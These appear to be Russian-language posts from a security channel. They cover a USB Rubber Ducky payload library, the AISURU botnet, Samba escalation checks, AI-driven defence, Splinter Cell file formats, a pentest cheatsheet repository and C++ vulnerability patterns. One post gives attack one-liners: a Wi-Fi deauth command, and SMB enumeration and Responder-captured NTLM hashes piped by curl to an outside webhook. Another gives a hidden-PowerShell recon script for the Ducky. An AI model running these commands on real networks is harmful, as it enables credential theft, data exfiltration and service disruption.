USB Rubber Ducky: библиотека полезных пейлоадов

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺USB Rubber Ducky - это флешка, которая притворяется клавиатурой.
Вы вставляете её в ПК, и она мгновенно начинает вводить команды с нереальной скоростью. А официальный репозиторий usbrubberducky-payloads - это огромная библиотека готовых DuckyScript‑пейлоадов: от быстрого recon до автоматизации рутинных задач.

⏺Пейлоады пишутся на DuckyScript 3.0: теперь это полноценный мини‑язык с функциями, циклами, режимами HID/Storage, рандомизацией, OS‑детекцией и расширениями.

⏺Работать удобнее всего через PayloadStudio - это веб‑IDE с автокомплитом, встроенными расширениями и компиляцией в inject.bin. Написал payload.txt → собрал → вставил «утку» → получил автоматизацию уровня «вставил и ушёл».

⏺Пример минимального пейлоада (авто‑recon):

DELAY 500
GUI r
STRING powershell -nop -w hidden
ENTER
DELAY 700
STRING whoami; ipconfig; systeminfo | Out-File C:\recon.txt
ENTER

Компиляция и загрузка

# Собрать payload через PayloadStudio
# Файл inject.bin скопировать в корень "утки"

Структура репозитория

payloads/
  ├── recon/
  ├── exfiltration/
  ├── remote_access/
  └── privesc/
languages/
extensions/

ZeroDay | #Инструмент

📝 Наглядно системная иерархия в Linux

ZeroDay | #Linux

Супероружие, которое взорвет интернет - ботнет AISURU

👋 Приветствую в мире цифровой безопасности!

Расскажу, почему AISURU стал настолько серьезным ботнетрм и чем он отличается от классических IoT‑ботнетов.

⏺AISURU вырос с ~6 до ~30 Tbps за месяцы. Это уже полноценный инфраструктурный ботнет, который способен давить даже сетевые магистрали и CDN. Мощность у него распределена по тысячам подсетей, поэтому трафик выглядит как нормальный глобальный шум, что усложняет фильтрацию 😬

⏺Рост обеспечен автоматизированной цепочкой заражений: а именно сбор свежих CVE для SOHO‑роутеров, массовые сканеры, точечная эксплуатация и самораспространение. Ботнет ставит агента поверх уязвимого фреймворка, убирает конкурентов, закрепляется в системе и сразу встраивается в общую командно‑управляющую сеть.

⏺Внутри команды есть чёткое разделение: одни занимаются поиском багов, другие — созданием эксплойтов под новые модели оборудования, третьи - построением прокси‑цепочек и инфраструктуры управления. За счёт этого AISURU стабильно пополняет «флот» и быстро адаптируется под патчи производителей.

⏺Технологически ботнет еще как отличается от обычных Mirai‑форков: у него есть продвинутое обнаружение honeypot‑ловушек, динамическое переключение IP‑пула, методы обхода фильтрации, а также авто‑тюнинг под конкретный DDoS‑вектор (UDP‑flood, TCP‑flood, amplification‑варианты).

⏺Текущие цели ботнета такие: игровые платформы, облачные провайдеры, телеком‑операторы, крупные SaaS‑сервисы. Главное отличие AISURU - он продаётся как услуга, поэтому характер атак постоянно меняется: оператор подстраивает сценарий под защиту конкретной жертвы, что увеличивает эффект от атак.

ZeroDay | #история

3 лайфхака для веб-пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте сетевых протоколов и Wi-Fi и защите от них.

⏺Быстрое перечисление SMB-шар без кредов + отправка результатов на webhook: собирает пользователей, шары и политики, логирует удаленно.

crackmapexec smb target.example.com –shares –users –pass-pol | curl -s -X POST https://webhook.site/your-id –data-binary @-

⏺Wi-Fi deauth-атака с подтверждением через webhook: отключает клиентов от AP, пинг на webhook подтверждает успех (клиент reconnect’ится и триггерит).

airodump-ng wlan0mon # найди BSSID и клиент aireplay-ng -0 10 -a BSSID -c CLIENT_MAC wlan0mon && curl -s https://webhook.site/your-id -d “deauth_success=$(date)”

⏺LLMNR/NBT-NS poisoning с захватом хэшей + webhook-лог: отравляем запросы в сети, ловим NTLM-хэши и сразу шлем на webhook для оффлайн-кракинга.

responder -I eth0 -v | grep “NTLMv2” | curl -s -X POST https://webhook.site/your-id –data-binary @-

➡️Защита: отключить SMBv1/guest, мониторить 445/139, использовать WPA3 + PMF, отключить LLMNR/NBT-NS/mDNS, предпочитать unicast DNS.

ZeroDay | #пентест

Разбираем базовые правила киберзащиты

👋 Приветствую в мире цифровой безопасности!

Поговорим о том, как компаниям защитить себя.

⏺Самый простой способ сохранять информационную безопасность на высоком уровне — это наличие отдела кибербезопасности, который отслеживает получаемые угрозы.

⏺Однако не всегда ресурсы компании позволяют нанять профессионалов — тогда помочь может чек-лист требований, которые обязательно нужно соблюдать, чтобы избежать успешных атак.

⏺Составили такой список для небольшой IT-компании вместе с ИИ-помощником Гигачат. Слушайте и сохраняйте.

ZeroDay | #Инструмент

Samba в домене: где появляются скрытые точки эскалации

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как ресурсы Samba часто становится незаметной лазейкой внутри домена.

⏺Частая история: Samba поднимают для обмена файлами, добавляют пару ресурсов, меняют права, и всё остаётся так навсегда. Со временем появляются папки с лишним доступом на запись, забытые тестовые директории и неправильные ACL. Именно в таких местах и начинается эскалация.

⏺Смотрим, что реально доступно юзеру: надо обнаружить каталоги, куда неожиданно можно записывать файлы, или ресурсы, которые раскрывают структуру домена больше, чем нужно.

smbclient -L //server
smbmap -H server

⏺Проверяем чувствительные каталоги: особенно те, где лежат скрипты, конфиги или файлы, которые используются системными сервисами. Возможность изменить такой файл превращается в скрытую точку повышения привилегий.

smbmap -H server -R /path
smbclient //server/resource

⏺Следим за изменениями в конфигах: новые ресурсы и мелкие правки в smb.conf - частая причина появления слабых мест. Проще включить наблюдение за конфигом и фиксировать каждое изменение.

auditctl -w /etc/samba/smb.conf -p wa -k sambawatch
ausearch -k sambawatch

ZeroDay | #samba

Следующий виток развития кибереза: мультиагентные атакующие системы защиты

👋Приветствую в мире цифровой безопасности!

Расскажу о ландшафте кибергуроз и способах митигации уязвимостей будущего

⏺В 85% кибератак в мире будет задействован ИИ уже к следующему году. О том как бизнесу противостоять современным киберугрозам, рассказал в интервью «Ведомости» вице-президент по кибербезопасности Сбера Сергей Лебедь.

⏺Более 50% компаний России уже столкнулись с атаками хакеров. Традиционно в их арсенале DDoS-атаки и вредоносное ПО, но атаки становятся все более и более мощными, в том числе благодаря ИИ. Это известное противостояние "пули и брони" в отрасли. Но что же делать?

⏺Для дальнейшей эффективной защиты необходимо развивать ИИ в трех ключевых направлениях кибербезопасности: для автоматизации реагирования, для автоматизированной безопасной разработки, а также в рамках ассистентов и копайлотов, которые компенсируют недостаток знаний экспертов и увеличивают скорость получения и обработки данных командами (или то и другое).

⏺Для защиты нужно разрабатывать автономные мультиагентные системы. Они уже в скором будущем станут залогом киберустойчивости. Сбер уже разработал и внедрил такую: одна ее часть — атакующая, она в близком к реальному времени режиме эксплуатирует угрозы в безопасной среде банка. Другая — защищающая, которая учится на основе этого опыта и корректирует процессы реагирования.

⏺Для повышения уровня кибербезопасности в России в Сбере год назад открыли для отечественных компаний платформу X Threat Intelligence, к которой уже подключилось более 500 компаний страны. На платформе в течение двух часов появляется инфа о любой появившейся в мире уязвимости, а также способы ее устранения.

ZeroDay | #Инструмент

Формат файлов, который не удаётся взломать уже 20 лет

Файлы .lin из игры Splinter Cell выглядят как типичный архив с уровнями, текстурами и моделями, но на деле всё ох, как хитрее. Странные адреса загрузки, непоследовательные смещения, «лишние» данные и таблицы файлов, которые не совпадают с реальными файлами, из-за этого привычные способы распаковки не работают. За двадцать лет ни один реверсер так и не смог полностью извлечь содержимое 🤷‍♂️

⏺В статье разбирают, как устроены .lin: маленькие блоки сжатых данных, таблицы с информацией о файлах, особая логика загрузки в Unreal Engine 2, и почему стандартные архиваторы здесь бессильны. Плюс, как отладка игры через эмулятор Xbox помогает увидеть, как игра реально читает данные.

ZeroDay | #Статья

Cheatsheet‑God: один репозиторий вместо сотни закладок

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что это такое по сути: Cheatsheet‑God - это офлайн‑банк шпаргалок, техник, синтаксиса и методологий для пентеста. Не сканер и не эксплойт‑фреймворк, а такой сборник того, что проверять, куда смотреть и какими командами работать на каждом этапе атаки.

⏺Почему он до сих пор полезен: репозиторий собирался под OSCP и реальные пентесты. Там есть проверенные цепочки действий: от первичного доступа до пост‑эксплуатации. В 2025 это всё ещё актуально, потому что базовые ошибки и векторы не меняются так быстро, как инструменты.

⏺Что внутри: репозиторий разбит на десятки файлов, каждый - под отдельную тему.
Примеры направлений:
• privilege escalation (Linux / Windows)
• password attacks и hash‑атаки
• BOF и exploit writing
• Active Directory и доменные сценарии
• web‑атаки, SQLi, XSS, file inclusion
• post‑exploitation и lateral movement

ZeroDay | #Инструмент

Опасные ловушки C++: строки, формат и случайность

👋 Приветствую в мире цифровой безопасности!

C++-код может выглядеть аккуратно, но при этом нести в себе уязвимости, из-за которых сканеры ИБ запрещают библиотеку к использованию.

⏺Строковые функции C - классика: strcpy, sprintf, gets и подобные не знают границ буфера. Если данные длиннее ожидаемого, начинается запись в чужую память.

char buf[64];
sprintf(buf, "%s", user_input); // переполнение

Последствия тут - crash, DoS, а в худшем случае вообще выполнение чужого кода.

Правильный минимум:

snprintf(buf, sizeof(buf), "%s", user_input);

Идеально тут std::string, std::vector.

⏺Форматные строки - очень короткая уязвимость: Ошибка не в printf, а в доверии к вводу.

printf(user_input); // опасно

Атакующий может читать память (%x) или писать в неё (%n).
Правильно всегда так:

printf("%s", user_input);

⏺rand() не случайность, а угадывание: rand() подходит для игр, но не для токенов, сессий и идентификаторов.

std::string token = std::to_string(rand());

Такой токен можно перебрать или предсказать.

В следующей части разберем еще ловушки управления памятью и неопределённое поведение, которые ломают даже «опытный» C++.

ZeroDay | #Cplusplus

Опасные ловушки C++: память, UB и DoS (часть 2)

👋 Приветствую в мире цифровой безопасности!

C++-код может выглядеть аккуратно, но при этом нести в себе уязвимости, из-за которых сканеры ИБ запрещают библиотеку к использованию.

⏺Use-After-Free - управление программой через память: Указатель остаётся, а объект уже удалён.

std::vector<int>* v = new std::vector<int>();
delete v;
v->at(0); // UAF

Это один из самых опасных классов уязвимостей: от краша до RCE. Решение - RAII и умные указатели:

auto v = std::make_unique<std::vector<int>>();

⏺Неопределённое поведение - враг, которого не видно: UB - это не «ошибка», а разрешение компилятору делать что угодно.

Примеры:

i = ++i + 1;        // UB
int* p = nullptr;
*p;                // UB
int x = INT_MAX+1; // UB

⏺DoS через утечки ресурсов: Если сервер не закрывает сокеты и не освобождает ресурсы, его можно «задушить» соединениями.

read(newsockfd, buffer, 1024);
// close(newsockfd); // забыли

Атака элементарна: открыть тысячи соединений и ничего не закрывать.

⏺Как находить всё это до атакующих: Минимальный must-have:

GCC / Clang:
• -fsanitize=address
• -fsanitize=undefined
• -Wall -Wextra -Wpedantic

MSVC:
• /GS
• /sdl

Санитайзеры находят больше уязвимостей, чем ручной код-ревью.

ZeroDay | #Cplusplus